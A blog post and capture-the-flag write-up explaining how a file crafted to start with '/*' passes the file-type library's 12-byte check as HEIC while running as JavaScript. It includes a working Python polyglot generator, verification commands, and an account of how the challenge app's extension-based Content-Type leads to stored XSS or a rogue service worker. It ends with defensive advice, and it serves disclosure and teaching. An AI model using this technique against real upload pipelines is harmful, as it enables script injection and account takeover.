Want to work it out yourself before reading on? The challenge is live at pwnbox.io/challenges/usual-suspect , go solve it first, then come back for the breakdown.
A while back I wrote about libmagic inconsistencies that lead to type confusion , the idea that the program guessing a file's type and the program consuming it rarely agree, and that the gap between them is where bugs live.
This post is the same idea wearing different clothes. The suspect
this time is
file-type
, the de-facto "what is this buffer?" library for
Node, and the contraband is a file that is simultaneously a
valid HEIC image and a valid text payload of
your choosing: JavaScript, HTML, CSS, even JSON. The image
half is fixed; the other half is whatever the consuming endpoint will
execute or trust, in the challenge it ends up as a service
worker, but that's just one door of several.
I found the primitive while building a challenge
(Usual Suspect) around it. We'll build the polyglot,
then watch a single upload pipeline disagree with itself about what
it's holding.
Why a server trusts twelve bytes
ISO Base Media File Format (the container under MP4, MOV, HEIC, AVIF, …) is a sequence of boxes. Every box begins with a 4-byte size, a 4-byte type, and then its payload:
A well-formed HEIC starts with an ftyp box whose major
brand (heic) sits at bytes 8-11. The size field
at the very front, here 00 00 00 18, is
the part to remember: a real parser uses it, the sniffer throws it
away.
Here is the entire detection routine from file-type's
core.js (16.5.4):
// File Type Box (ISO base media file format)
if (
checkString('ftyp', {offset: 4}) &&
(buffer[8] & 0x60) !== 0x00 // Brand major, first character ASCII?
) {
const brandMajor = buffer.toString('binary', 8, 12).replace('\0', ' ').trim();
switch (brandMajor) {
case 'avif': return {ext: 'avif', mime: 'image/avif'};
case 'mif1': return {ext: 'heic', mime: 'image/heif'};
case 'heic': case 'heix': return {ext: 'heic', mime: 'image/heic'};
// ...
}
}
Read it closely and notice what is not there:
- It checks
ftypat offset 4. - It checks that byte 8 has bit
0x60set, a cheap "is this roughly a printable ASCII letter" mask.his0x68, and0x68 & 0x60 == 0x60, soheicsails through. - It reads the brand from bytes 8-11.
- It does not read, validate, or even glance at bytes 0-3. The box-size field is irrelevant to the sniff.
That last point is the whole vulnerability. In a real parser the size field tells you how long the box is; here it is dead weight. And dead weight in a header is exactly what a polyglot wants: four attacker-controlled bytes sitting before the magic, with no constraints on them at all.
Turning the box size into a comment
JavaScript block comments open with /* and close with
*/. If the first two bytes of the file are
/*, then every byte after that, including
ftyp, including the brand, including any binary garbage
, is inside a comment until the parser sees */.
So the recipe is to overwrite the unused size field with
/*, leave ftyp and the brand where the
sniffer expects them, then close the comment and write code:
Laid out as text, the start of the file literally reads:
/*--ftypheic....heicmif1*/
globalThis.__pwned = 'it ran';
// ... rest of your script ...
- To
file-type:ftypis at offset 4, the brand isheicat offset 8 →image/heic. It stopped reading at byte 12 and never noticed the/*. - To a JavaScript engine:
/*--ftypheic....heicmif1*/is a comment, and what follows is ordinary code.
The only rule for the bytes between offset 12 and the closing
*/ is "don't accidentally contain
*/." Since file-type reads nothing
past byte 11, we don't need a renderable image at all, we
just need those twelve bytes correct and the comment cleanly closed.
And /* is only the JavaScript (and CSS) flavour. The
four free bytes adapt to whatever grammar the consuming endpoint
speaks: you just need some way to neutralize the twelve
fixed bytes near the front, then append your real payload.
| Target format | First bytes (0-3) | How ftyp…heic is hidden |
Closes with |
|---|---|---|---|
| JavaScript / CSS | /* + filler |
a block comment | */ |
| HTML | <!-- |
an HTML comment | --> |
| JSON | " + filler |
a single string value | " |
(JSON strings can't hold raw NUL bytes or unescaped quotes, so for
that variant keep the brand's "minor version" bytes
printable instead of \x00.) Same twelve image bytes, a
different host language each time, and, as we'll see, the
language the application picks for you is what decides
which sink you land in.
Generator
#!/usr/bin/env python3
"""Generate a HEIC / JavaScript polyglot.
file-type (16.5.4) inspects only 12 bytes of an ISO-BMFF header:
- bytes 4..7 must be the literal b"ftyp"
- byte 8 must satisfy (b & 0x60) != 0 ("printable-ish")
- bytes 8..11 are the brand major -> b"heic" maps to image/heic
The 4-byte box-size field (bytes 0..3) is NEVER validated, so we
overwrite it with b"/*" to open a JavaScript block comment.
"""
def make_polyglot(js: bytes, brand: bytes = b"heic") -> bytes:
assert len(brand) == 4
# bytes 0-3: "/*" + filler -> opens the JS comment (the unused "box size")
# bytes 4-7: ftyp -> required by file-type at offset 4
# bytes 8-11: brand -> "heic" -> image/heic
head = b"/*--" + b"ftyp" + brand + b"\x00\x00\x00\x00" + brand + b"mif1"
assert b"*/" not in head # don't close the comment early
return head + b"*/\n" + js # close comment, then real JavaScript
if __name__ == "__main__":
js = b"globalThis.__pwned = 'it ran';\n"
import sys
sys.stdout.buffer.write(make_polyglot(js))
And the proof that both faces are real, one buffer, two truths:
$ python3 gen.py > poly.heic.js
$ node -e "require('file-type').fromBuffer(require('fs').readFileSync('poly.heic.js')).then(d=>console.log(d))"
{ ext: 'heic', mime: 'image/heic' } # the server sees an image
$ node --check poly.heic.js && echo OK
OK # the browser sees valid JS
The first 32 bytes, for the record:
b'/*--ftypheic\x00\x00\x00\x00heicmif1*/\ngloba'
Why this matters: the two-faced upload
A single detector being shallow is a curiosity. It becomes a vulnerability when an application makes one decision based on the sniff and a different decision based on something else, exactly the type-confusion pattern from the libmagic post.
The Usual Suspect challenge is a chat app with an
attachment pipeline. Watch a file pass through three different
"what type are you?" checkpoints and lie at each one.
1. The S3-style upload gate (presigned POST policy):
['starts-with', '$Content-Type', 'image/'],
The upload is rejected unless the client-declared
Content-Type starts with image/. We just
say image/heic. The bytes are never inspected ,
this gate trusts a form field.
2. The server-side "is it really an image?" check (register.js):
const detected = await FileType.fromBuffer(buf);
if (!detected || !detected.mime || !detected.mime.startsWith('image/')) {
return res.status(415).json({ error: 'unsupported file' });
}
This one is meant to be the honest check, it
ignores the client's claim and sniffs the actual bytes. And it does
sniff them… all twelve of them. Our polyglot returns
image/heic. Pass.
3. The download gate (attachments.js), and here is the punchline:
// public Content-Type comes from the URL's extension (the file's
// public face). Internal storage Content-Type is ignored.
res.setHeader('Content-Type', contentTypeFromName(filename));
When the file is served back out, the response
Content-Type is derived from the filename's
extension, not from the bytes and not from what was
stored. The registration step builds the public name from the
user-supplied filename's extension:
const ext = safeExt(filename); // attacker controls this
const publicName = `${hash}.${ext}`; // -> "<hash>.js"
So we register the attachment with a filename ending in
.js. The same bytes that were "an image"
at the gate are now served with:
HTTP/1.1 200 OK
Content-Type: application/javascript
Three checkpoints, three different notions of the file's type , the form field, the magic bytes, and the extension , and the file satisfies all of them while being, in reality, executable script. That is the type confusion. The polyglot is what lets one artifact answer all three questions at once.
We picked .js here, but that extension map also hands
out .html, .json, .css, and
.svg. Because the served Content-Type
follows the extension we choose at registration time, the
exact same polyglot bytes can be served as a script, a
"trusted" JSON response, an HTML page, or a stylesheet
, each one a different downstream sink. Which door you
actually walk through is just a matter of which extension you
register; in the Usual Suspect challenge it's
.js plus a client-side path traversal that turns the
upload into a service worker running in the admin's session. The
mechanics of that last step are left as an exercise.
The image detector did its job perfectly. It just answered a question, "are these twelve bytes an image?" , that was never the question that mattered.
The pattern, restated
Both this and the libmagic write-up are instances of the same anti-pattern:
A "type" is not a property of a file. It is an opinion held by a specific piece of code that looked at a specific slice of bytes. Two pieces of code, two slices, two opinions, and a polyglot is the file engineered to make every opinion come out "safe."
file-type is fast and convenient precisely because it
reads as little as possible. For HEIC that's twelve bytes with a
four-byte hole in front of them. If your security boundary is
"this upload is an image," a passing sniff is necessary
but nowhere near sufficient, re-encode the image, or at
minimum make the content type you serve a function of the
bytes you verified, not of a filename or a form field the
attacker also controls.
A few practical notes
- Other brands, other MIME types. Swap the 4-byte brand and you get a different verdict from the same trick:
avif→image/avif,mif1→image/heif,qt→video/quicktime,M4A→audio/x-m4a. The box-size hole is brand-agnostic; any ISO-BMFF typefile-typerecognizes is polyglot-able. - It's a 12-byte sniff, not a parser. The rest of the file can be anything that doesn't break out of your chosen wrapper (no early
*/,-->, or unescaped"). You do not need a decodable image. - Other host formats, other sinks.
.jshere feeds a service worker, but the same buffer registered as.html,.json,.css, or.svgis served with thatContent-Type, turning the one polyglot into stored XSS, a poisoned API response, style/markup injection, and so on. The image side is fixed byfile-type; the weaponized side is whatever the app will trust. - Detect once, serve the same thing. The real defect is a consistency gap: the server sniffed the bytes at upload time but derived the served
Content-Typefrom the filename extension at download time. Decide the type a single time, from the bytes, at upload, persist that value, and serve exactly it back. If detection saysimage/heic, the response must beimage/heic(or the upload is rejected); the type you verified and the type you serve should never be allowed to drift apart, and neither should ever come from an attacker-controlled extension.
References
- Previous post, libmagic inconsistencies that lead to type confusion
file-type,core.js, theftypbox detection block- ISO base media file format, box structure and the
ftypbox - Service Worker API, script execution model and scope